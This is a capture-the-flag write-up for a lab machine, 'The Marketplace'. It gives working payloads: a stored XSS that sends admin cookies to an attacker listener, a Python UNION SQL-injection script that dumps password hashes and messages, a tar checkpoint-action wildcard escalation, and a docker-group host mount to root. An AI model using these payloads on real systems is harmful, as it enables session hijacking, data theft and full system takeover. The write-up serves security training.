# The Marketplace

## `nmap`
```
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp    open  http    nginx 1.19.2
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry 
|_/admin
32768/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: The Marketplace
```

## HTTP 80
### XSS
Sign up and log in. The _New listing_ page allows an obvious stored XSS through the _Description_ field:
```
<script>alert(1);</script>
```
Let us leak the cookies using the following payload:
```
<script>document.location="http://**.*.*.***:8765/?c="+document.cookie;</script>
```
Set up a TCP listener on that port. Now report to the admin requesting `/report/<item_id>` where `<item_id>` is the new item index (new listings start from `3`). Grab an admin cookie:
```
$ nc -lnp 8765
GET /?c=token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE3MTY1MDc4MjV9.CB7L1Gdw2sxWTijSTbf7mdKtPFPRY8q89c3UxVRIP3I HTTP/1.1
Host: **.*.*.***:8765
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/85.0.4182.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost:3000/item/3
Accept-Encoding: gzip, deflate
Accept-Language: en-US
```
Replace the `token` cookie by the admin JWT (HS256, no weak secret) and check out the _Administration panel_ for the **1st flag**.

### SQLi
The admin panel has a `user` GET parameter to access the user info, and it seems SQL injectable:
```
http://10.10.***.***/admin?user=%27
Error: ER_PARSE_ERROR: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
```
We write the following Python script to lead our [MySQL injections](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md):
```python
import requests

URL = 'http://10.10.*.*/admin'
ADMIN_JWT = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.*.*'


## Discover 4 columns expected
SQLI = "0 UNION SELECT version(),version(),version(),version() -- "


## Extract the password hashes (guessing table & column names)
for i in range(1, 4):
    SQLI = f"0 UNION SELECT username,password,password,password FROM users WHERE id={i} -- "
    #print(requests.get(URL, cookies={'token': ADMIN_JWT}, params={'user': SQLI}).text)

# system  $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW
# michael $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q
# jake    $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG

# https://hashcat.net/wiki/doku.php?id=example_hashes
# seems to be 30600: bcrypt(sha256($pass)) / bcryptsha256
# so this should be strong enough to resist brute-force...


## Find other tables
# as a single request, using json_arrayagg() to avoid the char limit of group_concat():
SQLI = "0 UNION SELECT 1,json_arrayagg(TABLE_NAME),3,4 FROM information_schema.TABLES -- "
#print(requests.get(URL, cookies={'token': ADMIN_JWT}, params={'user': SQLI}).text)
# => internal usage tables then: items, messages, users


## Find columns for table messages
SQLI = "0 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.COLUMNS WHERE TABLE_NAME='messages' -- "
#print(requests.get(URL, cookies={'token': ADMIN_JWT}, params={'user': SQLI}).text)
# => id,user_from,user_to,message_content,is_read


## Read messages
SQLI = "0 UNION SELECT group_concat(user_to),json_arrayagg(message_content),3,4 FROM messages -- "
print(requests.get(URL, cookies={'token': ADMIN_JWT}, params={'user': SQLI}).text)
# => interesting message to user 3 (jake): "Hello!\r\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\r\nYour new password is: @b_E**REDACTED**"
```
So we have `jake`'s password.

## SSH
### `jake`
Log in as `jake` and read `~/user.txt` for the **2nd flag**.
```
jake@the-marketplace:~$ sudo -l
...
User jake may run the following commands on the-marketplace:
    (michael) NOPASSWD: /opt/backups/backup.sh
jake@the-marketplace:~$ ls -l /opt/backups/backup.sh
-rwxr-xr-x 1 michael michael 73 Aug 23  2020 /opt/backups/backup.sh
jake@the-marketplace:~$ cat /opt/backups/backup.sh
#!/bin/bash
echo "Backing up files...";
tar cf /opt/backups/backup.tar *
```
We can [abuse `tar`](https://gtfobins.github.io/gtfobins/tar/) to get a shell (`bash -p`) as `michael`:
```
jake@the-marketplace:~$ mkdir /tmp/tardir
jake@the-marketplace:~$ cd /tmp/tardir
jake@the-marketplace:/tmp/tardir$ touch a ./'--checkpoint=1' ./'--checkpoint-action=exec=bash -p'
jake@the-marketplace:/tmp/tardir$ rm -f /opt/backups/backup.tar
jake@the-marketplace:/tmp/tardir$ sudo -u michael /opt/backups/backup.sh
Backing up files...
michael@the-marketplace:/tmp/tardir$ id
uid=1002(michael) gid=1002(michael) groups=1002(michael),999(docker)
```

### `michael`
Unlike `jake`, `michael` is in the [`docker` group](https://gtfobins.github.io/gtfobins/docker/).
```
michael@the-marketplace:~$ docker images
REPOSITORY                   TAG                 IMAGE ID            CREATED             SIZE
themarketplace_marketplace   latest              6e3d8ac63c27        3 years ago         2.16GB
nginx                        latest              4bb46517cac3        3 years ago         133MB
node                         lts-buster          9c4cc2688584        3 years ago         886MB
mysql                        latest              0d64f46acfd1        3 years ago         544MB
alpine                       latest              a24bb4013296        3 years ago         5.57MB
michael@the-marketplace:~$ docker ps
CONTAINER ID        IMAGE                        COMMAND                  CREATED             STATUS              PORTS                     NAMES
49ecb0cfeba8        nginx                        "/docker-entrypoint.…"   3 years ago         Up ** minutes       0.0.0.0:80->80/tcp        themarketplace_nginx_1
3c6f21da8043        themarketplace_marketplace   "bash ./start.sh"        3 years ago         Up ** minutes       0.0.0.0:32768->3000/tcp   themarketplace_marketplace_1
59c54f4d0f0c        mysql                        "docker-entrypoint.s…"   3 years ago         Up ** minutes       3306/tcp, 33060/tcp       themarketplace_db_1
```
Simply start an `alpine` container mounting the host filesystem into `/mnt`:
```
michael@the-marketplace:~$ docker run -v /:/mnt -it alpine sh
/ # cd /mnt/root/
/mnt/root # ls
root.txt
```
Read `root.txt` to get the **3rd flag**.
